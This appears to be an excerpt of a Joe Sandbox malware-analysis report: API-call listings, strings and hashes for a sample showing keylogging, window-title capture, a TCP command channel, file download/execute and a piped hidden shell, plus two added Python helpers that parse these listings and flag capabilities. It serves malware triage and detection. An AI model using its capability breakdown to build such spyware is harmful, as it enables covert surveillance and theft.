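    ref: int     # return address inside the dumped image

    def param(self, index):
        """Return a slot only if it lies within the prototype's parameter count."""
        if index < ARITY.get(self.api, 0) and index < len(self.args):
            return self.args[index]
        return None


def parse_api_line(line):
    """Parse one '• Api.Module(args), ref: addr' line; None for any other line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    args = [None if tok.strip() == "?" else int(tok, 16)
            for tok in m["args"].split(",") if tok.strip()]
    return ApiCall(m["api"], m["module"], args, int(m["ref"], 16))


def decode_access(mask):
    """Name a samDesired mask, e.g. 0x20019 -> 'KEY_READ (0x20019)'."""
    for value, name in KEY_COMPOSITES:
        if mask == value:
            return f"{name} (0x{mask:X})"
    names = [name for bit, name in KEY_BITS if mask & bit] or ["<none>"]
    return "|".join(names) + f" (0x{mask:X})"


def fmt_root(value):
    return "?" if value is None else HKEY_ROOTS.get(value, f"handle 0x{value:X}")


def describe(call):
    """One-line reading of a call with its constants resolved."""
    head = f"{call.api} @{call.ref:08X}"
    if call.api == "RegOpenKeyExA":
        access = call.param(3)
        access_txt = "?" if access is None else decode_access(access)
        return f"{head}: root={fmt_root(call.param(0))} access={access_txt}"
    if call.api == "RegCreateKeyA":
        return f"{head}: root={fmt_root(call.param(0))} (create-or-open)"
    if call.api == "RegSetValueExA":
        kind, size = call.param(3), call.param(5)
        kind_txt = "?" if kind is None else REG_TYPES.get(kind, f"0x{kind:X}")
        return f"{head}: type={kind_txt} size={'?' if size is None else size}"
    if call.api == "RegQueryValueExA":
        return f"{head}: reads a value"
    return head


def hkcu_writes(calls):
    """Return refs of RegSetValueExA calls made on a key opened/created under HKCU."""
    hits, current_root = [], None
    for c in calls:
        if c.api in ("RegOpenKeyExA", "RegCreateKeyA"):
            current_root = c.param(0)
        elif c.api == "RegSetValueExA" and current_root == 0x80000001:
            hits.append(c.ref)
        elif c.api == "RegCloseKey":
            current_root = None
    return hits


if __name__ == "__main__":
    calls = [c for c in map(parse_api_line, SAMPLE_LINES.splitlines()) if c]
    for c in calls:
        print(describe(c))
    print("REG_SET under HKCU at:", [f"{r:08X}" for r in hkcu_writes(calls)])
```

The arity table is the important caveat: Joe Sandbox prints whatever sits on the stack at the call site, so for RegSetValueExA only the first six slots are parameters and the remaining eight (including repeated 004660A4 and 000000AF values) are stack residue from the caller. Reading constants beyond the prototype's arity, or trusting a pointer-typed slot as a value, gives wrong conclusions; the example therefore resolves only positions the prototype defines and leaves pointer arguments alone.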
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: _wcslen
• String ID: pQG
• API String ID: 176396367-3769108836
• Opcode ID: c50c2063860dd9f07635b7b10a5bf04525f51203df799d6542eaf58ab7b4cd2f
• Instruction ID: e6961f6084f98a1e57a9a6385a58e5d20214d93246a99e64d0d6a4ea431d93e1
• Opcode Fuzzy Hash: c50c2063860dd9f07635b7b10a5bf04525f51203df799d6542eaf58ab7b4cd2f
• Instruction Fuzzy Hash: 8111C3319002059BCB15EF65E8529EF7BB5EF54318B10013FF406A62E2EFB8AD05CB98
Uniqueness

Uniqueness Score: -1.00%

APIs
• GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B7CA
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: GlobalMemoryStatus
• String ID: @
• API String ID: 1890195054-2766056989
• Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
• Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
• Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                                                                                                                    • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • _free.LIBCMT ref: 004461A6
                                                                                                                                                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                                                                                                                    • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,00432F02,00000000,0000000F,0042F90C,?,?,004319B3,?,?,00000000), ref: 004461E2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocateHeap$_free
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1482568997-0
                                                                                                                                                                    • Opcode ID: 0c50226df9aed064d9fc72c30ff8f5201140dd52271d3dd40973ea300b8a0024
                                                                                                                                                                    • Instruction ID: bbbbf11ac8836aedddebace835184d628c0e8eb9448606daf7135ff7baabef38
                                                                                                                                                                    • Opcode Fuzzy Hash: 0c50226df9aed064d9fc72c30ff8f5201140dd52271d3dd40973ea300b8a0024
                                                                                                                                                                    • Instruction Fuzzy Hash: ACF0683120051566BF212A16AD01B6F375D8F83B75F17411BF91466292DE3CD911916F
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • socket.WS2_32(?,00000001,00000006), ref: 00404852
                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                                                                                                                                      • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateEventStartupsocket
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1953588214-0
                                                                                                                                                                    • Opcode ID: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                                                                                                                                                    • Instruction ID: 7af5cc85a36d800a693892934b5c0b91abe86707509305098cc6d5fca1b6a633
                                                                                                                                                                    • Opcode Fuzzy Hash: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                                                                                                                                                    • Instruction Fuzzy Hash: 6E0171B1408B809ED7359F38A8456977FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 42a83028ea29ee4520479fdfd1ce509581fbe236408560bbb12e48215694f405
                                                                                                                                                                    • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                                                                                                                                                                    • Opcode Fuzzy Hash: 42a83028ea29ee4520479fdfd1ce509581fbe236408560bbb12e48215694f405
                                                                                                                                                                    • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 0041BAB8
                                                                                                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BACB
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Window$ForegroundText
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 29597999-0
                                                                                                                                                                    • Opcode ID: a221c2eefa6d09992f8ba53c09ea2394ba17581a0e53e18ab9a0c25fada816b0
                                                                                                                                                                    • Instruction ID: 4615795adb372a642f3ed3ff298372a60f443b3219566b47796808df054d69ed
                                                                                                                                                                    • Opcode Fuzzy Hash: a221c2eefa6d09992f8ba53c09ea2394ba17581a0e53e18ab9a0c25fada816b0
                                                                                                                                                                    • Instruction Fuzzy Hash: CCE0D875A00328A7E720A7A49C4EFE5776CEB08701F0000EEBA18D71C2EAB4AD04C7E4
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: c1bd85037f78227014944570c8e1386f57ec7c93b410e94521ce381e63f7069c
                                                                                                                                                                    • Instruction ID: 7a76c105a712203ac593d2e3a9180375903654e9edbd33c69f6c8f8a5c58a470
                                                                                                                                                                    • Opcode Fuzzy Hash: c1bd85037f78227014944570c8e1386f57ec7c93b410e94521ce381e63f7069c
                                                                                                                                                                    • Instruction Fuzzy Hash: 971123B27201019FD7149B18C890FA6B76AFF51721B59425AE202CB3B2DB30EC91C694
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • CallNextHookEx.USER32(004750F0,?,?,?), ref: 0040A3D2
                                                                                                                                                                      • Part of subcall function 0040B646: GetKeyState.USER32(00000011), ref: 0040B64B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CallHookNextState
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3280314413-0
                                                                                                                                                                    • Opcode ID: 6b470850cb74240f926f2eab6fdb76e6f3f96cca2ed87157acb1fc025dc76ce0
                                                                                                                                                                    • Instruction ID: 9fd9bfc1c78bf2eb699ce6f84754fab0632f1b56c41780e55bb560be8a05fe45
                                                                                                                                                                    • Opcode Fuzzy Hash: 6b470850cb74240f926f2eab6fdb76e6f3f96cca2ed87157acb1fc025dc76ce0
                                                                                                                                                                    • Instruction Fuzzy Hash: E1F062322043055BCA14AEA99D8486FBA55DB95319B00183FBD02666D2CB7AD8289B5F
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%
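
As an added example (not part of the Joe Sandbox report), the following Python helper parses the API-call lines of these execution-graph entries, decodes the constant arguments that matter for the verdicts above (socket type and protocol, the Winsock version passed to WSAStartup, the VK_CONTROL key queried inside the hook procedure, the GetWindowTextW buffer size) and flags the API combinations behind the keyboard-hook, active-window-title and TCP-client entries. The constant table and the capability rules are this example's own triage heuristics, not Joe Sandbox signature logic; the sample listing is copied from the entries on this page.

```python
"""Triage helper for Joe Sandbox execution-graph API listings (added example)."""
import re
from collections import defaultdict

# One API-call line of the listing, e.g.
#   • socket.WS2_32(?,00000001,00000006), ref: 00404852
#   • GetForegroundWindow.USER32 ref: 0041BAB8
#   • Part of subcall function 0040B646: GetKeyState.USER32(00000011), ref: 0040B64B
API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s+ref:\s+(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Sample input: API lines copied from the execution-graph entries on this page.
SAMPLE = """\
• GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B7CA
• _free.LIBCMT ref: 004461A6
  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
• socket.WS2_32(?,00000001,00000006), ref: 00404852
• CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
  • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
• GetForegroundWindow.USER32 ref: 0041BAB8
• GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BACB
• CallNextHookEx.USER32(004750F0,?,?,?), ref: 0040A3D2
  • Part of subcall function 0040B646: GetKeyState.USER32(00000011), ref: 0040B64B
"""


def parse_args(raw):
    """Turn '?,00000001,00000006' into [None, 1, 6]; '?' means unresolved by the analyser."""
    if raw is None or raw.strip() == "":
        return []
    out = []
    for tok in raw.split(","):
        tok = tok.strip()
        if tok == "?":
            out.append(None)
            continue
        try:
            out.append(int(tok, 16))
        except ValueError:
            out.append(tok)  # keep anything that is not a hex literal verbatim
    return out


def parse_api_lines(text):
    """Return one dict per recognised API-call line; other report lines are ignored."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        calls.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": parse_args(m.group("args")),
            "ref": int(m.group("ref"), 16),
            "subcall_of": int(m.group("sub"), 16) if m.group("sub") else None,
        })
    return calls


# (api, argument index, value) -> meaning, using the documented Windows constants.
CONSTANTS = {
    ("socket", 1, 1): "SOCK_STREAM",
    ("socket", 2, 6): "IPPROTO_TCP",
    ("WSAStartup", 0, 0x0202): "Winsock 2.2 requested",
    ("GetKeyState", 0, 0x11): "VK_CONTROL",
    ("GetWindowTextW", 2, 0x100): "256-wchar title buffer",
}


def decode_args(call):
    """Annotate the arguments of one call whose values are known constants."""
    notes = []
    for idx, val in enumerate(call["args"]):
        if not isinstance(val, int):
            continue
        meaning = CONSTANTS.get((call["api"], idx, val))
        if meaning:
            notes.append(f"arg{idx}=0x{val:X} ({meaning})")
    return notes


# Capability heuristics used by this example (assumption, not Joe Sandbox's rules):
# every API in the set must occur somewhere in the listing.
CAPABILITIES = {
    "keyboard hook chain": {"CallNextHookEx", "GetKeyState"},
    "active-window title capture": {"GetForegroundWindow", "GetWindowTextW"},
    "TCP client initialisation": {"WSAStartup", "socket"},
}


def find_capabilities(calls):
    """Map each matched capability name to the sorted code addresses that back it."""
    by_api = defaultdict(set)
    for c in calls:
        by_api[c["api"]].add(c["ref"])
    found = {}
    for name, needed in CAPABILITIES.items():
        if needed.issubset(by_api):
            refs = set()
            for api in needed:
                refs |= by_api[api]
            found[name] = sorted(refs)
    return found


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    for c in parsed:
        print(f"{c['ref']:08X} {c['api']}.{c['module']} {' '.join(decode_args(c))}")
    for name, refs in find_capabilities(parsed).items():
        print(f"[+] {name}: " + ", ".join(f"{r:08X}" for r in refs))
```

The three capability rules deliberately require the co-occurrence of two APIs rather than any single one: GetWindowTextW alone is common in benign GUI code, but paired with a hook procedure that forwards via CallNextHookEx and checks VK_CONTROL it is the shape of a keystroke logger that tags input with the active window title.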

                                                                                                                                                                    APIs
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
• Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
• Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
• Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
Uniqueness
Uniqueness Score: -1.00%

APIs
• WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: Startup
• String ID:
• API String ID: 724789610-0
• Opcode ID: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
• Instruction ID: a24ce82555f98f109a53945ea9c337c8597cdca763f75144b39f195b4e3f482d
• Opcode Fuzzy Hash: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
• Instruction Fuzzy Hash: 0DD0C9325586088AE620AAB4AD0B8A4775C8312615F0007AA6CA5835D2E6446A19C2AA
Uniqueness
Uniqueness Score: -1.00%

APIs
• std::_Deallocate.LIBCONCRT ref: 00402E2B
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: Deallocatestd::_
• String ID:
• API String ID: 1323251999-0
• Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
• Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
• Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
• Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: send
• String ID:
• API String ID: 2809346765-0
• Opcode ID: a64cf630b3b4fcbf92e6cf8d3c010959396a6b24f5439efeece66edae75e3506
• Instruction ID: 80dceff54fd7c7607e374e8a405dba3f032bb15cdc3f4a53630576a73fa931ff
• Opcode Fuzzy Hash: a64cf630b3b4fcbf92e6cf8d3c010959396a6b24f5439efeece66edae75e3506
• Instruction Fuzzy Hash: 79B09279108202FFCB150B60CD0887A7EAAABC8381F008A2CB187411B1C636C852AB26
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: recv
• String ID:
• API String ID: 1507349165-0
• Opcode ID: 12f17b9eb2b05ccee17ecde8d051cd75af37e2c2e0a2002d53484fbbe037e517
• Instruction ID: 54da5cb0358175ea3eef87e0ba5f02fe09cc36e19498aa822303b7a5c5cf0de8
• Opcode Fuzzy Hash: 12f17b9eb2b05ccee17ecde8d051cd75af37e2c2e0a2002d53484fbbe037e517
• Instruction Fuzzy Hash: 38B09B75108302FFC6150750CC0486A7D66DBC8351B00481C714641170C736C8519725
Uniqueness
Uniqueness Score: -1.00%

APIs
• VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
• Instruction ID: 079a7b638a28e99b338f4493b6ebfa8105bff269478f0661155a893ef6bf0f7e
• Opcode Fuzzy Hash: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
• Instruction Fuzzy Hash: 13B00872418382EBCF02DF90DD0492ABAB2BB88741F184C5CB2A14107187228428EB06
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetEvent.KERNEL32(?,?), ref: 00407CB9
• GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
• DeleteFileW.KERNEL32(00000000), ref: 00407DA9
  • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
  • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
  • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
  • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
  • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
  • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
• GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00408278
• SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
• DeleteFileA.KERNEL32(?), ref: 00408652
  • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
  • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
  • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
  • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
• Sleep.KERNEL32(000007D0), ref: 004086F8
• StrToIntA.SHLWAPI(00000000,00000000), ref: 0040873A
  • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
Strings
Memory Dump Source
• Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
• String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
• API String ID: 1067849700-181434739
• Opcode ID: 639be6e9c3666f0e56d442c7c633dd056aad2af30071dddc6934612cfb90f67c
• Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
• Opcode Fuzzy Hash: 639be6e9c3666f0e56d442c7c633dd056aad2af30071dddc6934612cfb90f67c
• Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
Uniqueness
Uniqueness Score: -1.00%

APIs
• __Init_thread_footer.LIBCMT ref: 004056E6
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
• __Init_thread_footer.LIBCMT ref: 00405723
• CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
• CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
• Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
• PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
• ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
